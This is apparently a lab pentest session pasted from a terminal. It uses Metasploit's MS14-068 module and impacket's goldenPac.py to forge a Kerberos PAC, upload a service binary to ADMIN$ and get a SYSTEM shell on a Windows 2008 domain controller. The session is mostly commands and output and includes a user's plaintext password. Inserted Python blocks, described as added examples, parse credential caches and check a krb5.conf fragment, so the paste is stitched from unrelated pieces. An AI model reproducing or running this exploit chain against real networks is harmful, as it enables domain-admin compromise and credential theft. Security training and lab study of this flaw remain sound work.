Untitled

a guest
Nov 9th, 2018
msf auxiliary(socks4a) > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf auxiliary(ms14_068_kerberos_checksum) > show info

       Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
     Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-11-18

Provided by:
  Tom Maddock
  Sylvain Monne
  juan vazquez <juan.vazquez@metasploit.com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DOMAIN                     yes       The Domain (upper case) Ex: DEMO.LOCAL
  PASSWORD                   yes       The Domain User password
  RHOST                      yes       The target address
  RPORT     88               yes       The target port
  Timeout   10               yes       The TCP timeout to establish connection and read data
  USER                       yes       The Domain User
  USER_SID                   yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

Description:
  This module exploits a vulnerability in the Microsoft Kerberos
  implementation. The problem exists in the verification of the
  Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  where a domain user may forge a PAC with arbitrary privileges,
  including Domain Administrator. This module requests a TGT ticket
  with a forged PAC and exports it to a MIT Kerberos Credential Cache
  file. It can be loaded on Windows systems with the Mimikatz help. It
  has been tested successfully on Windows 2008.

References:
  https://cvedetails.com/cve/CVE-2014-6324/
  https://technet.microsoft.com/en-us/library/security/MS14-068
  OSVDB (114751)
  http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  https://github.com/bidord/pykek
  https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
DOMAIN => contoso-west.org
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
RHOST => 10.0.0.149
msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
USER => blot
msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting                                 Required  Description
   ----      ---------------                                 --------  -----------
   DOMAIN    CONTOSO-WEST                                    yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD                                                  yes       The Domain User password
   RHOST     10.0.0.149                                      yes       The target address
   RPORT     88                                              yes       The target port
   Timeout   10                                              yes       The TCP timeout to establish connection and read data
   USER      blot                                            yes       The Domain User
   USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
PASSWORD => Bl0tt12309-
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting                                 Required  Description
   ----      ---------------                                 --------  -----------
   DOMAIN    CONTOSO-WEST                                    yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  Bl0tt12309-                                     yes       The Domain User password
   RHOST     10.0.0.149                                      yes       The target address
   RPORT     88                                              yes       The target port
   Timeout   10                                              yes       The TCP timeout to establish connection and read data
   USER      blot                                            yes       The Domain User
   USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[!] 10.0.0.149:88 - KRB_AP_ERR_BADMATCH - Ticket and authenticator don't match
[-] 10.0.0.149:88 - Invalid TGS-REP, aborting...
[*] Auxiliary module execution completed
msf auxiliary(ms14_068_kerberos_checksum) > set domain contoso-west.org
domain => contoso-west.org
msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST.ORG...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
[+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
[*] Auxiliary module execution completed


proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
ProxyChains-3.1 (http://proxychains.sf.net)
Enter blot's password:
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
net rpc> user
net rpc user> show
Usage: net rpc user show <username>
net rpc user show failed: NT_STATUS_INVALID_PARAMETER
net rpc user> show blot
user rid: 1109, group rid: 513
net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe


auxiliary/admin/kerberos/ms14_068_kerberos_checksum

msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
DOMAIN => CONTOSO-WEST
msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
RHOST => 10.0.0.149
msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
USER => blot
msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
msf auxiliary(ms14_068_kerberos_checksum) > show options

Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):

   Name      Current Setting                                 Required  Description
   ----      ---------------                                 --------  -----------
   DOMAIN    contoso-west.org                                yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  Bl0tt12309-                                     yes       The Domain User password
   RHOST     10.0.0.149                                      yes       The target address
   RPORT     88                                              yes       The target port
   Timeout   10                                              yes       The TCP timeout to establish connection and read data
   USER      blot                                            yes       The Domain User
   USER_SID  S-1-5-21-3039018489-1111549232-2925702125-1109  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000

msf auxiliary(ms14_068_kerberos_checksum) > run

[*] Validating options...
[*] Using domain CONTOSO-WEST.ORG...
[*] 10.0.0.149:88 - Sending AS-REQ...
[*] 10.0.0.149:88 - Parsing AS-REP...
[*] 10.0.0.149:88 - Sending TGS-REQ...
[+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
[+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
[*] Auxiliary module execution completed

root@10-kali2-group10:~/.msf4/loot# ls
20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
root@10-kali2-group10:~/.msf4/loot#


To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets.

root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc

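The file moved above is a MIT Kerberos credential cache. As an added example (not the paste's, Metasploit's or impacket's code), the Python below reads the version 4 ccache layout and summarizes what a recovered cache holds: the default principal, and for each credential the client and service principals, encryption type, validity window and ticket flags. That is the first thing an incident responder wants from such a file when it turns up on a host. The cache it parses is constructed inline with made-up timestamps and a dummy session key; the user and realm names from this session are reused only as labels.

```python
"""Reader for MIT Kerberos credential cache (ccache) files, format version 4.

Added example; not the Metasploit module's or impacket's code. Layout per the
MIT krb5 ccache file format (integers big-endian): uint16 version 0x0504,
uint16 header_len, header tags, default principal, then credentials to EOF.
The sample cache built below is constructed (not the page's loot file).
"""
import struct
import sys

# Ticket flag bits as stored in the ccache (MIT TKT_FLG_* values).
FLAG_BITS = {"FORWARDABLE": 0x40000000, "FORWARDED": 0x20000000,
             "PROXIABLE": 0x10000000, "RENEWABLE": 0x00800000,
             "INITIAL": 0x00400000, "PRE_AUTHENT": 0x00200000}


class Reader:
    def __init__(self, buf):
        self.buf, self.pos = buf, 0

    def take(self, n):
        if self.pos + n > len(self.buf):
            raise ValueError("truncated ccache at offset %d" % self.pos)
        self.pos += n
        return self.buf[self.pos - n:self.pos]

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())  # uint32 length + bytes

    def principal(self):  # uint32 name_type, uint32 ncomp, realm, components
        self.u32()
        ncomp = self.u32()
        realm = self.data().decode("utf-8", "replace")
        comps = [self.data().decode("utf-8", "replace") for _ in range(ncomp)]
        return "/".join(comps) + "@" + realm


def parse_ccache(buf):
    """Return {'default_principal': str, 'credentials': [dict, ...]}."""
    r = Reader(buf)
    version = r.u16()
    if version != 0x0504:
        raise ValueError("only ccache version 4 is handled, got 0x%04x" % version)
    r.take(r.u16())  # header tags (tag 1 = KDC time offset); not needed here
    cache = {"default_principal": r.principal(), "credentials": []}
    while r.pos < len(buf):
        cred = {"client": r.principal(), "server": r.principal()}
        cred["enctype"] = r.u16()
        r.data()  # session key; not needed for triage
        for name in ("authtime", "starttime", "endtime", "renew_till"):
            cred[name] = r.u32()
        r.u8()  # is_skey
        cred["flags"] = r.u32()
        for _ in range(2):  # address list, then authdata list: count + (uint16 type, data)*
            for _ in range(r.u32()):
                r.u16()
                r.data()
        cred["ticket_len"] = len(r.data())
        r.data()  # second_ticket
        cache["credentials"].append(cred)
    return cache


def flag_names(flags):
    return [n for n, bit in FLAG_BITS.items() if flags & bit]


def ticket_status(cred, now):
    if now < cred["starttime"]:
        return "not yet valid"
    return "expired" if now >= cred["endtime"] else "valid"


# Builder for the constructed sample; mirrors the layout parsed above.
def _data(b):
    return struct.pack(">I", len(b)) + b


def _principal(name, realm, name_type=1):  # 1 = NT-PRINCIPAL, 2 = NT-SRV-INST
    comps = name.split("/")
    return (struct.pack(">II", name_type, len(comps)) + _data(realm.encode())
            + b"".join(_data(c.encode()) for c in comps))


def build_sample_ccache(authtime=1541797200, realm="CONTOSO-WEST.ORG"):
    header = struct.pack(">HHii", 1, 8, 0, 0)  # tag 1 DeltaTime: seconds, usec
    flags = FLAG_BITS["FORWARDABLE"] | FLAG_BITS["RENEWABLE"] | FLAG_BITS["INITIAL"]
    cred = (_principal("blot", realm) + _principal("krbtgt/" + realm, realm, 2)
            + struct.pack(">H", 23) + _data(b"\x11" * 16)  # enctype 23 (RC4-HMAC), dummy key
            + struct.pack(">IIII", authtime, authtime, authtime + 36000, authtime + 7 * 86400)
            + b"\x00" + struct.pack(">I", flags)  # is_skey, ticket flags
            + struct.pack(">II", 0, 0)  # no addresses, no authdata
            + _data(b"\x61" + b"\x00" * 63) + _data(b""))  # opaque ticket blob, no second ticket
    return struct.pack(">HH", 0x0504, len(header)) + header + _principal("blot", realm) + cred


if __name__ == "__main__":
    raw = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ccache()
    for c in parse_ccache(raw)["credentials"]:
        print(c["client"], "->", c["server"], flag_names(c["flags"]), "endtime", c["endtime"])
```

Run it with a file path to inspect a real cache. MIT client tools such as kinit and klist locate the cache through KRB5CCNAME or, when that is unset, the default FILE:/tmp/krb5cc_<uid>; a cache at any other path is only used when KRB5CCNAME points at it.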
Modified /etc/krb5.conf with nano and added:

[realms]
CONTOSO-WEST.ORG = {
    kdc = dc2008r2-group1
    admin_server = dc2008r2-group1
    default_domain = CONTOSO-WEST
}
[domain_realm]
.contoso-west = CONTOSO-WEST.org
contoso-west = CONTOSO-WEST.org


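Two things in this fragment are worth checking before relying on it: the [domain_realm] entries point at CONTOSO-WEST.org while the [realms] entry is CONTOSO-WEST.ORG, and MIT krb5 compares realm names case-sensitively; and the mapping keys lack the .org suffix that the KDC's host name carries, so a lookup for dc2008r2-group1.contoso-west.org never matches either of them. The Python below, added here and not part of the paste or of MIT krb5, parses the relevant sections of krb5.conf, reproduces the [domain_realm] suffix lookup, and reports these inconsistencies. The fixed fragment inside it is this example's own corrected version, and the check that a kdc value is fully qualified is the example's own heuristic.

```python
"""Consistency checks for the [realms] and [domain_realm] sections of krb5.conf.

Added example; not part of the paste or of MIT krb5. The parser handles the
'[section]', 'key = value' and 'key = { ... }' forms used in krb5.conf; the
check functions are this example's own heuristics. BAD_FRAGMENT is a copy of
the fragment from the paste, FIXED_FRAGMENT a corrected version for comparison.
MIT krb5 matches realm names exactly: realm names are case-sensitive.
"""

BAD_FRAGMENT = """
[realms]
CONTOSO-WEST.ORG = {
    kdc = dc2008r2-group1
    admin_server = dc2008r2-group1
    default_domain = CONTOSO-WEST
}
[domain_realm]
.contoso-west = CONTOSO-WEST.org
contoso-west = CONTOSO-WEST.org
"""

FIXED_FRAGMENT = """
[realms]
CONTOSO-WEST.ORG = {
    kdc = dc2008r2-group1.contoso-west.org
    admin_server = dc2008r2-group1.contoso-west.org
}
[domain_realm]
.contoso-west.org = CONTOSO-WEST.ORG
contoso-west.org = CONTOSO-WEST.ORG
"""


def parse_krb5_conf(text):
    """Parse krb5.conf into nested dicts. A repeated key keeps its last value."""
    conf, stack = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            stack = [conf.setdefault(line[1:-1], {})]
        elif not stack:
            raise ValueError("entry before any [section]: %r" % raw)
        elif line == "}":
            if len(stack) < 2:
                raise ValueError("unbalanced '}'")
            stack.pop()
        else:
            key, _, value = (p.strip() for p in line.partition("="))
            if value == "{":
                stack.append(stack[-1].setdefault(key, {}))
            else:
                stack[-1][key] = value
    return conf


def host_to_realm(domain_realm, hostname):
    """[domain_realm] lookup as MIT does it: the exact (lower-cased) hostname
    first, then each parent domain with a leading dot, longest suffix first."""
    host = hostname.lower().rstrip(".")
    table = {k.lower(): v for k, v in domain_realm.items()}
    labels = host.split(".")
    candidates = [host] + ["." + ".".join(labels[i:]) for i in range(1, len(labels))]
    for cand in candidates:
        if cand in table:
            return table[cand]
    return None


def check_krb5_conf(conf, service_host):
    """Return a list of findings (empty when the fragment looks consistent)."""
    findings = []
    realms = conf.get("realms", {})
    domain_realm = conf.get("domain_realm", {})
    for realm, settings in realms.items():
        if realm != realm.upper():
            findings.append("realm %r in [realms] is not upper case" % realm)
        kdc = settings.get("kdc", "") if isinstance(settings, dict) else ""
        if kdc and "." not in kdc.split(":")[0]:  # heuristic: expect an FQDN, optional :port
            findings.append("kdc %r for %s is not fully qualified; resolution depends on the resolver search list" % (kdc, realm))
    for domain, realm in domain_realm.items():
        if realm not in realms:
            same = [r for r in realms if r.upper() == realm.upper()]
            hint = " (differs only in case from %r; realm names are case-sensitive)" % same[0] if same else ""
            findings.append("[domain_realm] %s -> %r has no [realms] entry%s" % (domain, realm, hint))
    mapped = host_to_realm(domain_realm, service_host)
    if mapped is None:
        findings.append("no [domain_realm] entry covers host %s; its realm will come from DNS or fallback rules" % service_host)
    elif mapped not in realms:
        findings.append("host %s maps to realm %r, which has no [realms] entry" % (service_host, mapped))
    return findings


if __name__ == "__main__":
    for label, text in (("paste fragment", BAD_FRAGMENT), ("fixed fragment", FIXED_FRAGMENT)):
        print(label + ":")
        for f in check_krb5_conf(parse_krb5_conf(text), "dc2008r2-group1.contoso-west.org") or ["ok"]:
            print("  -", f)
```

The goldenPac run that follows was not affected by these errors, because impacket ships its own Kerberos client and was given the KDC address with -dc-ip; the krb5.conf mapping matters for MIT tools such as kinit and klist, which resolve a service host to a realm through [domain_realm] and then find the KDC under [realms].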
proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation

Password:Bl0tt12309-
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|DNS-request| contoso-west.org
|S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
|DNS-response|: contoso-west.org does not exist
[-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
[*] Attacking domain controller 10.0.0.149
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
[*] 10.0.0.149 found vulnerable!
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[*] Requesting shares on 10.0.0.149.....
[*] Found writable share ADMIN$
[*] Uploading file UApVHfro.exe
[*] Opening SVCManager on 10.0.0.149.....
[*] Creating service TGOJ on 10.0.0.149.....
[*] Starting service TGOJ.....
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
[!] Press help for extra shell commands
|S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.0.0.149
   Subnet Mask . . . . . . . . . . . : 255.255.255.240
   Default Gateway . . . . . . . . . : 10.0.0.145

Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

C:\Windows\system32>